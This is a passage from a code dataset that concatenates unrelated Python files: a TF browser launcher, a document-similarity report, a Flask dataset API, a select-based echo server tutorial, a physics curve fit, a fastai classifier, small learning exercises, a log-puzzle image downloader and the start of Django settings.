Please wait ...\")\n        for line in processKernel.stdout:\n            sys.stdout.write(line)\n            if line.rstrip() == TF_ERROR:\n                return\n            if line.rstrip() == TF_DONE:\n                break\n        sleep(1)\n        stopped = processKernel.poll()\n\n    if not stopped:\n        portWeb = connectPort(tfProcesses, \"web\", 2, slug)\n        if portWeb:\n            console(f\"Connecting to running webserver via {portWeb}\")\n        else:\n            portWeb = getPort(portBase=newPortWeb)\n            console(f\"Starting new webserver listening on {portWeb}\")\n            if portWeb != newPortWeb:\n                console(f\"\\twhich is the first free port after {newPortWeb}\")\n            processWeb = Popen(\n                [\n                    pythonExe,\n                    \"-m\",\n                    \"tf.server.web\",\n                    slug,\n                    str(portKernel),\n                    str(portWeb),\n                ],\n                bufsize=0,\n                encoding=\"utf8\",\n            )\n\n    if not noweb:\n        sleep(2)\n        stopped = (not portWeb or (processWeb and processWeb.poll())) or (\n            not portKernel or (processKernel and processKernel.poll())\n        )\n        if not stopped:\n            console(f\"Opening {appName} in browser\")\n            webbrowser.open(\n                f\"{PROTOCOL}{HOST}:{portWeb}\", new=2, autoraise=True,\n            )\n\n    stopped = (not portWeb or (processWeb and processWeb.poll())) or (\n        not portKernel or (processKernel and processKernel.poll())\n    )\n    if not stopped:\n        try:\n            console(\"Press <Ctrl+C> to stop the TF browser\")\n            if processKernel:\n                for line in processKernel.stdout:\n                    sys.stdout.write(line)\n        except KeyboardInterrupt:\n            console(\"\")\n            if processWeb:\n                processWeb.terminate()\n                console(\"TF web server has stopped\")\n            if processKernel:\n                processKernel.terminate()\n                console(\"TF kernel has stopped\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"tf/server/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"170065007","text":"import sys\nimport pythone_functions2 as pf\nimport docx2txt\ntext_from_google = str(sys.argv[-1])\n\n\nwords_in_text_from_google = len(list(text_from_google.split()))\nnames_and_paths = dict()  # file name: path to the file\nfilenames_and_texts = dict()  # file name: text of the file\nfilenames_and_indents = dict()\n\nfor i in range(1, len(sys.argv) - 1, 2):\n    names_and_paths[sys.argv[i]] = sys.argv[i + 1]\n\nfor name, path in names_and_paths.items():\n    filenames_and_texts[name] = docx2txt.process(path)\n\nfor name, text in filenames_and_texts.items():\n    filenames_and_indents[name] = pf.marking_indentations(filenames_and_texts[name])\n\nfilenames_and_commongrams = dict()  # file name: 4-grams shared with text_from_google\nfor filename, text in filenames_and_texts.items():\n    filenames_and_commongrams[filename] = pf.making_set_of_common_grams(text_from_google, text)\n\nwith open('tempFiles\\\\newfile.txt', 'w', encoding='utf-8') as made_file:\n    made_file.write('<html>'\n                    '<head><title> Results </title>'\n                    '</head>'\n                    '<body>'\n                    '<table border=\"1\">'\n                    '<tr>'\n                    '<th>Name of a file</th>'\n                    '<th>Result</th>'\n                    '</tr>')\n
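# Each pass of the loop below appends one table row per compared file; a\n# sketch of the finished report row (assuming pf.percentage returns a number\n# such as 93.7 for a hypothetical thesis.docx) looks like:\n#\n#   <tr><td>thesis.docx</td><td>93.7% identical</td></tr>\n\n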
for filename in filenames_and_texts:\n\n    set_to_exclude = pf.making_list_of_reapeated_gramms(text_from_google, filenames_and_texts[filename],\n                                                        filenames_and_commongrams[filename])[2]\n\n    tagged_list_google = pf.adding_tags(text_from_google, filenames_and_commongrams[filename], set_to_exclude)\n    tagged_list_trans = pf.adding_tags(filenames_and_texts[filename], filenames_and_commongrams[filename],\n                                       set_to_exclude)\n    list_with_tags_and_indents_google = pf.making_paragraphs(pf.marking_indentations(text_from_google),\n                                                             tagged_list_google)\n    list_with_tags_and_indents_trans = pf.making_paragraphs(filenames_and_indents[filename], tagged_list_trans)\n\n    pf.creating_html(list_with_tags_and_indents_google, list_with_tags_and_indents_trans, filename)\n    identical_to_write = str(pf.percentage(tagged_list_google, tagged_list_trans))\n    with open('tempFiles\\\\newfile.txt', 'a', encoding='utf-8') as made_file:\n        made_file.write('<tr><td>' + filename + '</td><td>' + str(identical_to_write) +\n                        '% identical</td></tr>')\n\nwith open('tempFiles\\\\newfile.txt', 'a', encoding='utf-8') as made_file:\n    made_file.write('</table></body></html>
')\n# results:\nprint('len and type sys.argv ', len(sys.argv), type(sys.argv))\nprint('len names_and_paths ', len(names_and_paths))\nprint('len filenames_and_texts ', len(filenames_and_texts))\n","sub_path":"project1_js/get_the_job_done2.py","file_name":"get_the_job_done2.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"360034918","text":"import abc\nfrom collections import defaultdict\nfrom functions import RGFunction\nfrom routines import Routine\nclass RGModuleBase(abc.ABC):\n\t@abc.abstractmethod\n\tdef __init__(self):\n\t\tpass\n\t@abc.abstractmethod\n\tdef __call__(self, func):\n\t\treturn func\n\tdef fullname(self):\n\t\tif self.module is None:\n\t\t\treturn self.name\n\t\telse:\n\t\t\treturn self.module.fullname() + self.name\nclass RGBase(RGModuleBase): # Maybe make this a singleton?\n\tdef __init__(self):\n\t\tself.name = ''\n\t\tself.identifiers = {}\n\t\tself.module = None\n\tdef __call__(self, func):\n\t\tif isinstance(func, (RGFunction, RGSubModuleBase)):\n\t\t\t#if func.name in 'abcdefghijklmnopqrstuvwxyz' and len(func.name) == 1:\n\t\t\tif len(func.name) == 1:\n\t\t\t\tif func.name not in self.identifiers:\n\t\t\t\t\tself.identifiers[func.name] = func\n\t\t\t\t\tself.identifiers[func.name].module = self\n\t\t\t\telse:\n\t\t\t\t\tprint(self.identifiers[func.name], func.name)\n\t\t\t\t\traise ValueError(\"Name already used: %s\" % func.name)\n\t\t\telse:\n\t\t\t\traise ValueError(\"Invalid Name\")\n\t\telse:\n\t\t\traise TypeError\n\t\treturn func\n\tdef __getitem__(self, item):\n\t\tif not isinstance(item, str):\n\t\t\traise TypeError\n\t\tif len(item) < 1:\n\t\t\traise TypeError\n\t\telif len(item) == 1:\n\t\t\tret = self.identifiers[item]\n\t\t\treturn ret\n\t\telif len(item) > 1:\n\t\t\tret = self.identifiers[item[0]]\n\t\t\treturn ret[item[1:]]\nclass RGSubModuleBase(RGModuleBase):\n\tpass\n\nclass RGSubModule(RGSubModuleBase):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.identifiers = {}\n\t\tself.module = None\n\tdef __call__(self, func):\n\t\tif isinstance(func, (RGFunction, RGSubModuleBase)):\n\t\t\tif len(func.name) == 1:\n\t\t\t\tif func.name not in self.identifiers:\n\t\t\t\t\tself.identifiers[func.name] = func\n\t\t\t\t\tself.identifiers[func.name].module = self\n\t\t\t\telse:\n\t\t\t\t\tprint(self.identifiers[func.name], func.name)\n\t\t\t\t\traise ValueError(\"Name already used: %s\" % func.name)\n\t\t\t\t\t#self.identifiers['!'] = self.identifiers[func.name]\n\t\t\t\t\t#self.identifiers['!'].module = self\n\t\t\t\t\t#self.identifiers[func.name] = func\n\t\t\t\t\t#self.identifiers[func.name].module = self\n\t\t\telse:\n\t\t\t\traise ValueError(\"Invalid Name\")\n\t\telse:\n\t\t\traise TypeError\n\t\treturn func\n\tdef __getitem__(self, item):\n\t\tif not isinstance(item, str):\n\t\t\traise TypeError\n\t\tif len(item) < 1:\n\t\t\traise TypeError\n\t\telif len(item) == 1:\n\t\t\tret = self.identifiers[item]\n\t\t\treturn ret\n\t\telif len(item) > 1:\n\t\t\tret = self.identifiers[item[0]]\n\t\t\treturn ret[item[1:]]\nclass RGSpecialModuleBase(RGSubModuleBase):\n\tpass\nclass Reader(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Setter(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = 
name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Caller(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Value(RGFunction):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.module = parent\n\t\tself.name = name\n\tdef __call__(self, stack):\n\t\tif isinstance(self.parent, Reader):\n\t\t\tstack.append(self.parent.parent[self.name])\n\t\telif isinstance(self.parent, Setter):\n\t\t\tself.parent.parent[self.name] = stack.pop()\n\t\telif isinstance(self.parent, Caller):\n\t\t\titem = self.parent.parent[self.name]\n\t\t\titem = Routine(item)\n\t\t\titem(stack)\nclass VarModule:\n\tdef __init__(self):\n\t\tself.vars = {}\n\tdef reader(self, name):\n\t\treturn Reader(self, name)\n\tdef setter(self, name):\n\t\treturn Setter(self, name)\n\tdef caller(self, name):\n\t\treturn Caller(self, name)\n\tdef __getitem__(self, item):\n\t\treturn self.vars[item]\n\tdef __setitem__(self, item, val):\n\t\tself.vars[item] = val\n\tdef __delitem__(self, item):\n\t\tdel self.vars[item]\n\t\t","sub_path":"0.8/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"456735561","text":"from flask import Blueprint, jsonify, abort\nfrom annotationengine.errors import DataSetNotFoundException\nfrom flask import current_app, g\nimport cloudvolume\nimport requests\nimport os\nbp = Blueprint(\"dataset\", __name__, url_prefix=\"/dataset\")\n\nds_cache = {}\n\nclass MyCloudVolume(cloudvolume.CloudVolume):\n def lookup_supervoxel(self, x, y, z, scale_factor=(1, 1, 1)):\n voxel = self[int(x*scale_factor[0]),\n int(y*scale_factor[1]),\n int(z*scale_factor[2])]\n return int(voxel[0, 0, 0, 0])\n\n\nclass DataSetStore():\n def __init__(self, infoservice):\n url = os.path.join(infoservice, \"api/datasets\")\n r = requests.get(url)\n print(r.status_code)\n dataset_names = r.json()\n\n self.cvd = {}\n self.scale_factors = {}\n self.datasets = {}\n for dataset in dataset_names:\n url = os.path.join(infoservice, \"api/dataset/{}\".format(dataset))\n r = requests.get(url)\n print(r.status_code)\n d= r.json()\n self.datasets[dataset] = d\n path = d['pychunkgraph_segmentation_source']\n vol_path = d['image_source']\n try:\n img_cv = MyCloudVolume(vol_path, mip=0)\n\n self.cvd[dataset] = MyCloudVolume(path, mip=0,\n fill_missing=True,\n cache=True)\n scale_factor = img_cv.resolution / self.cvd[dataset].resolution\n self.scale_factors[dataset] = scale_factor\n except Exception as e:\n print('dataset {} failed to load because {}'.format(dataset, e))\n self.datasets.pop(dataset)\n\n def get_dataset_names(self):\n return [d for d in self.datasets.keys()]\n\n def get_cloudvolume(self, dataset):\n try:\n return self.cvd[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def get_scale_factor(self, dataset):\n try:\n return self.scale_factors[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def get_dataset(self, dataset):\n try:\n return self.datasets[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def 
lookup_supervoxel(self, dataset, x, y, z):\n        cv = self.get_cloudvolume(dataset)\n        sf = self.get_scale_factor(dataset)\n        return cv.lookup_supervoxel(x, y, z, sf)\n\n\n@bp.route(\"\")\ndef get_datasets():\n    db = get_dataset_db()\n    return jsonify(db.get_dataset_names())\n\n\n@bp.route(\"/<dataset>\")\ndef get_dataset(dataset):\n    db = get_dataset_db()\n    try:\n        return jsonify(db.get_dataset(dataset))\n    except DataSetNotFoundException:\n        abort(404)\n\n\ndef get_dataset_db():\n    if 'dataset_db' not in ds_cache:\n        ds_cache['dataset_db'] = DataSetStore(current_app.config['INFOSERVICE_ENDPOINT'])\n    return ds_cache['dataset_db']\n","sub_path":"annotationengine/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"358295663","text":"# ----------------------------------------------------------------------------\n# A demonstration of asynchrony built on passing control between functions.\n# We create our own event_loop with the select module.\n# ----------------------------------------------------------------------------\nimport socket\n\n# select is a system function that monitors file-like objects for changes of\n# state. On Unix everything is a file (devices, the system clock, USB and so\n# on), and every running process is a file as well; for example, when we call\n# bind on the server socket, a system socket file is created.\n# select works with file-like objects that have a .fileno() method, which\n# returns the file number (the descriptor, i.e. the number of the file\n# object) used in I/O operations.\nfrom select import select  # takes three lists: read, write, error\n\nsocket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nsocket_server.bind(('localhost', 5000))\nsocket_server.listen()\n\nto_monitor = []  # an empty watch list into which we will put objects that are ready for reading\n\n\n# Our own event_loop implementation: a manager that hands control over\n# depending on an object's state, with the help of the select module\n\n\ndef accept_connections(socket_server):\n    client_socket, addr = socket_server.accept()\n    print('Connected by', addr)\n\n    # add client_socket to the watch list\n    to_monitor.append(client_socket)\n\n\ndef send_message(client_socket):\n\n    data = client_socket.recv(1024)\n\n    if data:\n        response = f\"Hello world\\n \".encode()\n        client_socket.sendall(response)\n        client_socket.sendall(data)\n    else:\n        print(\"Client socket closed\")\n        client_socket.close()\n\n\ndef event_loop():\n    # a function that asynchronously passes control between send_message and\n    # accept_connections depending on each socket's state: ready for reading,\n    # ready for writing\n\n    while True:\n        # redy_to_read is the list of sockets ready for reading; the two\n        # empty lists are placeholders for the write and error lists\n        redy_to_read, _, _ = select(to_monitor, [], [])  # read, write, errors\n\n        for sock in redy_to_read:\n            if sock is socket_server:\n                accept_connections(sock)\n            else:\n                send_message(sock)\n\nif __name__ == \"__main__\":\n    # add the server socket to the watch list\n    to_monitor.append(socket_server)\n\n    # start the state handler\n    event_loop()\n\n    # call accept_connections, passing it the previously created socket_server\n
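    #\n    # A quick manual test of this echo server (a hypothetical shell session;\n    # it assumes nc is installed and the server is listening on\n    # localhost:5000):\n    #   $ echo hi | nc localhost 5000\n    #   Hello world\n    #    hi\n    #\n    # 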
accept_connections(socket_server)","sub_path":"async/2_socket_select.py","file_name":"2_socket_select.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"158759641","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\nplt.close('all')\n\n#constants\nh = 4.135667662*10**(-18)\n#keV*s\nc = 299792458\n#m/s\ntheta = 45*np.pi/180\n\ndef gaussFunc(x, a, x0, sigma):\n    return a*np.exp(-(x - x0)**2 / (2*sigma**2))\n\ndef linFunc(x, a, b):\n    return a*x+b\n\ndef loadData(fileName):\n\n    with open(fileName) as text:\n\n        counts = []\n        lister = text.readlines()\n        begin = lister.index('<<DATA>>\\n')+1\n        end = lister.index('<<END>>\\n')-1\n        data = lister[begin:end]\n        for i in data:\n            counts.append(float(i))\n        channels = range(0,len(data))\n        channels = np.array(channels)\n        counts = np.array(counts)\n\n    return channels, counts\n\ndef laueDiffFit(fileName, peak_width, peaks_x):\n\n    peak_channels = np.array([])\n    channels, counts = loadData(fileName)\n    for i in peaks_x:\n        par_limits = ([0, i-peak_width, 0], [1200, i+peak_width, 10])\n        peak_interval = [(channels[i]-peak_width),(channels[i]+peak_width)]\n        x = channels[peak_interval[0]:peak_interval[1]]\n        y = counts[peak_interval[0]:peak_interval[1]]\n        popt, pcov = curve_fit(gaussFunc, x, y, bounds = par_limits)\n        plt.plot(x, y, 'b.')\n        plt.plot(x, gaussFunc(x, *popt))\n        peak_channels = np.append(peak_channels,popt[1])\n\n    peak_energies = 0.01564856*peak_channels-0.07337194  # keV\n    lambdas = h*c/peak_energies\n    n = range(10,10+len(peak_energies))\n    d = np.array([])\n\n    for i in range(len(n)):\n        d = np.append(d,n[i]*lambdas[i]/(2*np.sin(theta)))\n\n    return lambdas, d\n\nlambdas, d = laueDiffFit('180410_data/glimmer_1800.mca', 25, [412, 453, 514, 566, 622, 677, 735])\nratio = lambdas[0:6]/lambdas[1:7]\navg_ratio = sum(ratio)/6\nprint(ratio)\nprint(avg_ratio)\nprint(d)\nprint(d[0]-d[len(d)-1])\n","sub_path":"laue_diffraction.py","file_name":"laue_diffraction.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"15154916","text":"from fastai.imports import *\nfrom fastai.torch_imports import *\nfrom fastai.transforms import *\nfrom fastai.conv_learner import *\nfrom fastai.model import *\nfrom fastai.dataset import *\nfrom fastai.sgdr import *\nfrom fastai.plots import *\n\ntorch.cuda.set_device(0)\n\nPATH = \"data/dogbreed/\"\nsz = 224\narch = resnext101_64\nbs = 58\nlabel_csv = f'{PATH}labels.csv'\nn = len(list(open(label_csv))) - 1  # header is not counted (-1)\nval_idxs = get_cv_idxs(n)  # random 20% data for validation set\nlabel_df = pd.read_csv(label_csv)\n\ndef get_data(sz, bs):  # sz: image size, bs: batch size\n    tfms = tfms_from_model(arch, sz, aug_tfms=transforms_side_on, max_zoom=1.1)\n    data = ImageClassifierData.from_csv(PATH, 'train', f'{PATH}labels.csv', test_name='test',\n                                        val_idxs=val_idxs, suffix='.jpg', tfms=tfms, bs=bs)\n\n    return data if sz > 300 else data.resize(340, 'tmp')  # Reading the jpgs and resizing is slow for big images, so resizing them all to 340 first saves time\n\ndata = get_data(sz, bs)\n\nlearn = ConvLearner.pretrained(arch, data, precompute=False)\nlearn.load('299_pre')\n\ndef prediction(fn):\n    root = 'data/dogbreed/prediction_samples/'\n    img = plt.imread(root+fn)\n    plt.imshow(img);\n\n    trn_tfms, val_tfms = tfms_from_model(arch, sz)\n    ds = FilesIndexArrayDataset([fn], 
np.array([0]), val_tfms, root)\n    dl = DataLoader(ds)\n    preds = learn.predict_dl(dl)\n    prediction = learn.data.classes[np.argmax(preds)]\n    likelies = [learn.data.classes[breed] for breed in np.argsort(preds)[0][-5:]][3::-1]\n    print('Prediction: {}'.format(prediction.capitalize()))\n    print('Other likely breeds: {0}, {1}, {2}, {3}'.format(*likelies))\n\ndef pred_output(fn):\n    root = 'data/dogbreed/prediction_samples/'\n    trn_tfms, val_tfms = tfms_from_model(arch, sz)\n    ds = FilesIndexArrayDataset([fn], np.array([0]), val_tfms, root)\n    dl = DataLoader(ds)\n    preds = learn.predict_dl(dl)\n    prediction = learn.data.classes[np.argmax(preds)]\n    return prediction\n\nif __name__ == '__main__':\n    prediction('aawl1.jpg')\n","sub_path":"roughs/src/predict_function.py","file_name":"predict_function.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"132355472","text":"###\n# File: enclousing.py\n# Created Date: 2020-10-30\n# Author: anddy.liu\n# Contact: \n# \n# Last Modified: Friday October 30th 2020 3:34:01 pm\n# \n# Copyright (c) 2020 personal\n# <>\n# -----\n# HISTORY:\n# Date \t By\tComments\n# ----------\t---\t----------------------------------------------------------\n###\ndef make(n):\n    x = []\n    for i in range(n):\n        # note: every lambda closes over the same variable i (late binding),\n        # so after the loop each one prints n - 1, not its creation index\n        x.append(lambda: print(i))\n    return x\n\nif __name__ == \"__main__\":\n    a = make(3)\n    for i in a:\n        i()","sub_path":"Learning_Python/Basic/Chapter14/enclousing.py","file_name":"enclousing.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"43844517","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 4 15:52:28 2019\n\n@author: han\n\"\"\"\n\nimport random\nimport time\n\nclass RemoteControl():\n\n    def __init__(self, tv_status=\"OFF\", tv_volume=0, channel_list=[\"NHK\"], channel=\"NHK\"):\n\n        self.tv_status = tv_status\n\n        self.tv_volume = tv_volume\n\n        self.channel_list = channel_list\n\n        self.channel = channel\n\n\n    def turnOn_tv(self):\n\n        if(self.tv_status == \"ON\"):\n            print(\"TV is already ON!\")\n        else:\n            print(\"TV is opening..\")\n            self.tv_status = \"ON\"\n\n\n    def turnOff_tv(self):\n        if(self.tv_status == \"OFF\"):\n            print(\"TV is already OFF!\")\n        else:\n            print(\"TV is closing..\")\n            self.tv_status = \"OFF\"\n\n\n    def adjustVolume(self):\n        while True:\n            answer = input(\"Decrease volume: '<'\\nIncrease volume: '>'\\nExit: exit\")\n\n            if(answer == '<'):\n                if(self.tv_volume != 0):\n\n                    self.tv_volume -= 1\n                    print(\"Volume:\", self.tv_volume)\n            elif (answer == '>'):\n                if(self.tv_volume != 32):\n\n                    self.tv_volume += 1\n\n                    print(\"Volume:\", self.tv_volume)\n\n            else:\n                print(\"Volume updated:\", self.tv_volume)\n                break\n\n    def addChannel(self, channel_name):\n\n        print(\"Channel adding..\")\n        time.sleep(1)\n\n        self.channel_list.append(channel_name)\n\n        print(\"Channel added.\")\n\n\n    def randomChannel(self):\n        randomGenerate = random.randint(0, len(self.channel_list) - 1)\n\n        self.channel = self.channel_list[randomGenerate]\n\n        print(\"Current channel:\", self.channel)\n\n\n    def __len__(self):\n\n        return len(self.channel_list)\n\n    def __str__(self):\n        return \"TV status: {}\\nTv volume: {}\\nChannel List: {}\\nCurrent channel: {}\\n\".format(self.tv_status, self.tv_volume, self.channel_list, self.channel)\n\n\n\nremote = RemoteControl()\n\n
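# A minimal scripted session (a sketch only; it drives the same methods the\n# menu below uses, and the channel name \"BBC\" is an arbitrary example):\n#\n#   rc = RemoteControl()\n#   rc.turnOn_tv()        # prints: TV is opening..\n#   rc.addChannel(\"BBC\")  # prints: Channel adding.. / Channel added.\n#   rc.randomChannel()    # prints: Current channel: NHK (or BBC)\n#   print(len(rc))        # 2 -> number of channels in channel_list\n\n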
print(\"\"\"\nTV Application\n\n1- Open TV\n\n2- Close TV\n\n3- Volume Settings\n\n4- Add channel\n\n5- Get number of channels\n\n6- Change channel randomly\n\n7- TV info\n\nq for exit\n\"\"\")\n\nwhile True:\n    process = input(\"Select Process: \")\n\n    if process == \"q\":\n        print(\"Program is closing...\")\n        time.sleep(1)\n        break\n    elif process == \"1\":\n        remote.turnOn_tv()\n    elif process == \"2\":\n        remote.turnOff_tv()\n    elif process == \"3\":\n        remote.adjustVolume()\n    elif process == \"4\":\n        channel_names = input(\"Input channel names with ',' separator\")\n\n        channel_list = channel_names.split(\",\")\n\n        for addingChannels in channel_list:\n            remote.addChannel(addingChannels)\n    elif process == \"5\":\n        print(\"Number of channels:\", len(remote))\n\n    elif process == \"6\":\n        remote.randomChannel()\n\n    elif process == \"7\":\n        print(remote)\n\n    else:\n        print(\"Invalid\")","sub_path":"f-han-keceli/Python/OOP/remote-control.py","file_name":"remote-control.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"225110215","text":"#!/usr/bin/env python3\n\"\"\"\nLogpuzzle exercise\n\nCopyright 2010 Google Inc.\nLicensed under the Apache License, Version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nGoogle's Python Class\nhttp://code.google.com/edu/languages/google-python-class/\n\nGiven an apache logfile, find the puzzle urls and download the images.\n\nHere's what a puzzle url looks like:\n10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] \"GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0\" 302 528 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\"\n\n\"\"\"\n\n\n__author__ = 'Rob Spears (GitHub: Forty9Unbeaten)'\n\nimport os\nimport re\nimport sys\nimport argparse\nimport webbrowser\n\nif sys.version_info[0] < 3:\n    print('\\n\\tGotta use Python 3 for this one...\\n')\n    sys.exit(1)\nelse:\n    import urllib.request\n\n\ndef read_urls(filename):\n    \"\"\"Returns a list of the puzzle urls from the given log file,\n    extracting the hostname from the filename itself.\n    Screens out duplicate urls and returns the urls sorted into\n    increasing order.\"\"\"\n\n    # Regular expression matches any string of non-whitespace\n    # characters that ends in \".jpg\"\n    img_file_regex = r'\\S*\\.jpg'\n\n    # Regular expression to determine if custom sorting is needed\n    custom_img_regex = r'-\\w*-\\w*\\.jpg'\n\n    server_name = 'http://{}'.format(filename.split('_')[1])\n\n    with open(filename, 'r') as f:\n        log_content = f.read()\n\n    # find all image urls in log file, eliminate duplicates and\n    # sort in order, accounting for custom sorting need defined\n    # in part C of assignment\n    img_urls = re.findall(img_file_regex, log_content)\n    need_custom_sort = re.search(custom_img_regex, log_content)\n\n    if need_custom_sort:\n        def custom_sort(url):\n            url = url.split('-')\n            return url[-1]\n        img_urls = filter(lambda x: re.search(custom_img_regex, x), img_urls)\n        img_urls = sorted(set(img_urls), key=custom_sort)\n    else:\n        img_urls = sorted(set(img_urls))\n\n    # concat server name with image url to create full URL\n    img_urls = [server_name + img_url for img_url in img_urls]\n\n    return img_urls\n\n
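\n# For \"place\"-style puzzles the urls end in -word1-word2.jpg and must be\n# ordered by the second word: with two hypothetical names, puzzle-b-a.jpg\n# sorts before puzzle-a-b.jpg, because custom_sort keys each url on its last\n# dash-separated piece ('a.jpg' < 'b.jpg').\n\n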
def download_images(img_urls, dest_dir):\n    \"\"\"Given the urls already in the correct order, downloads\n    each image into the given directory.\n    Gives the images local filenames img0, img1, and so on.\n    Creates an index.html in the directory\n    with an img tag to show each local image file.\n    Creates the directory if necessary.\n    \"\"\"\n    path = os.path.abspath(dest_dir)\n\n    # Create specified folder to store downloaded images\n    try:\n        os.makedirs(path)\n        print('\\n\\t{} folder created at {}\\n'.format(dest_dir, path))\n    except FileExistsError:\n        pass\n    except Exception as e:\n        print(e)\n\n    # download image files at each URL, store them in created\n    # directory and append them to a list that serves as the\n    # html tags\n    img_tags = []\n    print('\\tLoading...\\n')\n    for i, url in enumerate(img_urls):\n        try:\n            response = urllib.request.urlretrieve(\n                url, filename='{}/img{}.jpg'.format(path, i))\n            filename = response[0]\n            img_tags.append('<img src=\"{}\">'.format(filename))\n        except FileExistsError:\n            pass\n        except Exception as e:\n            print('\\n\\tError: {}'.format(e))\n    print('\\tDone!\\n')\n\n    # create index.html file and write html\n    full_html = ['<html>', '<body>', ''.join(img_tags), '</body>', '</html>']\n    index_file_path = '{}/index.html'.format(path)\n    with open(index_file_path, 'w') as f:\n        for tag in full_html:\n            f.write('{}\\n'.format(tag))\n\n    # prompt for viewing of html file\n    user_resp = input(\n        '\\tAll images have been downloaded successfully. ' +\n        'Would you like to see the picture?\\n\\tY/N:')\n\n    # open index.html in new browser tab\n    if user_resp.strip().lower() == 'y':\n        webpage = 'file://{}'.format(index_file_path)\n        webbrowser.open(webpage, new=2)\n    else:\n        print('\\n\\tindex.html file location:\\t{}'.format(index_file_path))\n\n\ndef create_parser():\n    \"\"\"Create an argument parser object\"\"\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        '-d', '--todir', help='destination directory for downloaded images')\n    parser.add_argument('logfile', help='apache logfile to extract urls from')\n\n    return parser\n\n\ndef main(args):\n    \"\"\"Parse args, scan for urls, get images from urls\"\"\"\n    parser = create_parser()\n\n    if not args:\n        parser.print_usage()\n        sys.exit(1)\n\n    parsed_args = parser.parse_args(args)\n\n    img_urls = read_urls(parsed_args.logfile)\n\n    if parsed_args.todir:\n        download_images(img_urls, parsed_args.todir)\n    else:\n        print('\\n'.join(img_urls))\n\n\nif __name__ == '__main__':\n    main(sys.argv[1:])\n","sub_path":"logpuzzle.py","file_name":"logpuzzle.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"208533808","text":"from bs4 import BeautifulSoup\n\nexampleFile = open('example.html')\nexampleSoup = BeautifulSoup(exampleFile.read(), 'lxml')\nelems = exampleSoup.select('#author')\ntype(elems)\n\nprint(len(elems))\ntype(elems[0])\nprint(elems[0].getText())\nprint(str(elems[0]))\nprint(elems[0].attrs)\n","sub_path":"BS4intro/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"45815226","text":"\"\"\"\nDjango settings for anniv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\ntry:\n    from secret_key import *\nexcept ImportError:\n    from django.utils.crypto import get_random_string\n    SETTINGS_DIR = os.path.abspath(os.path.dirname(__file__))\n
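    # On the very first run secret_key.py does not exist yet, so this branch\n    # generates a 50-character key and persists it; every later run takes the\n    # import at the top of the try block instead. Illustrative only (the\n    # value is random); the generated file contains one line such as:\n    #   SECRET_KEY = \"k3%x... 50 random characters ...\"\n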
